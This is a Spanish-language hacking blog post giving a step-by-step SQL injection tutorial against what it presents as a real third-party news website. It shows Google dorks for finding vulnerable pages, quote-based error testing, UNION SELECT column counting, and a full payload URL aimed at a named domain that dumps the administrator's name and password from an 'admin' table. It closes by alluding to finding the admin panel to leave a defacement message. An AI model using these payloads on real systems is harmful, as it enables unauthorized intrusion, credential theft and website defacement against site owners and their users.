Buenas tardes mis fieles seguidores del mundo del hack, hoy les traigo mi pequeño aporte como hacer una injeccion SQL, a una pagina web
Que debes saber???
Basico pagina web, lenguaje de programación html, php y sql por supuesto...
Usando google podemos buscar webs posiblemente vulnerables a SQL, usando alguna dork: inurl:”noticias.php?id=” solo es cuestion de alternar las dork y tener imaginación
Como es de notar ya yo tengo una web de ejemplo...
Es esta
buscamos dentro de ella alguna consulta a la base de datos...
si se han dado cuenta en la barra del la url dice .php?ID=xxxx
para saber si es vulnerable basta con colocar un simple ’ o un guion – después del ID?= y miramos que error nos da
en español dice: ah ocurrido un error en la sintaxis SQl, chequee su manual correspondiente a su MySQL versión y bla bla bla....
pues aquí comienza lo divertido (), hagamos una consulta a la base de datos a ver si nos deja...
php?ID=–1+union+select+0
dice algo asi, que estamos seleccionando un numero diferentes de columnas... pues sigamos haciendo mas consultas asi que sigo con
php?ID=–1+union+select+0,1
php?ID=–1+union+select+0,1,2
php?ID=–1+union+select+0,1,2,3
….
…
…
llegue hasta aquí la web posee 12 columnas jejeje esto suena interesante... ahora vemos que las columnas vulnerables son los numeros que nos arrojo en este caso: 2, 4, 5
hagamos consultas como: database() o now() o user() o versión() algo asi
la base de datos se llama cm142352, por lo visto no esta filtrando nuestra consultas...
ahora tratemos de volcar las tablas de datos a ver si llegamos a alguna importante,
bueno por lo visto no tenemos acceso al information.schema.tables... sera que todo esta perdido, no podemos dar mas pasos???
Mmm y que tal si usamos algunas tablas conocidas a ver si existen..
Administradores, usuarios, admin., user... a ver??
ven no todo esta perdido la tabla admin. Si existe... ahora tratemos de dar con su contenido
http://www.deminorias.com/noticia.php?ID=-1+union+select+0,1,nombre,3,pass,5,6,7,8,9,10,11+from+admin
que tal??? Ahí esta el logia y el pass del administrador de la web...(risa malvada), ahora solo falta conseguir el panel de administración de la web para entrar y dejarle algún mensaje...
bueno por ahora eso es todo... ya que no es la idea estar haciendo defaces por ahí, es mejor aprender... asi que
happy h4cking
saludos Venezuela[R00T]Team
No hay comentarios:
Publicar un comentario